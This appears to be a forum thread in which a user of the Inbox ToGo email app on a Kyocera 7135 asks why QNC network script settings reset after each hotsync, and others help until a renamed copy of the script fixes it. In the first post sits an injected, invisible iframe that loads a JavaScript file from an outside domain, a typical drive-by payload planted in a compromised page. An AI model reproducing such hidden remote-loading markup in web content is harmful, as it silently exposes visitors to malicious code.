+ Reply to Thread

Thread: Inbox ToGo

Inbox ToGo

I am using Inbox ToGo to sync with my company email system. The program works great with my "qnc" settings, but each time I hotsync the 7135 the network settings are reset to default on the script page.

Any clue why this is happening?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Everything’s easy for those who don't know how to do it.

What version are you using? I just got notification of an updated build. 2.002 (111)

Which settings are reset, you qnc or inbox2go?

I'm using ver. 2.002 (111), and the settings for qnc are being reset to default.

Everytime a hard reset happens the old qnc script it loaded from memory. I created a seperate qnc script called verizon qnc with all the correct settings. I utilize BackupBuddy so upon a hard reset both the qnc and verizon qnc are restored.
    I know I'm grasping here but maybe the qnc file got corrupt somehow. Try using a brand new script and see if that fixes it.

I made a copy of the existing QNC service with the correct script and save it under a new name,
    Sync-ed…and it worked.

That’s funny how again it reset the original QNC setting back to it default script settings, but not the new one I created.

Thanks…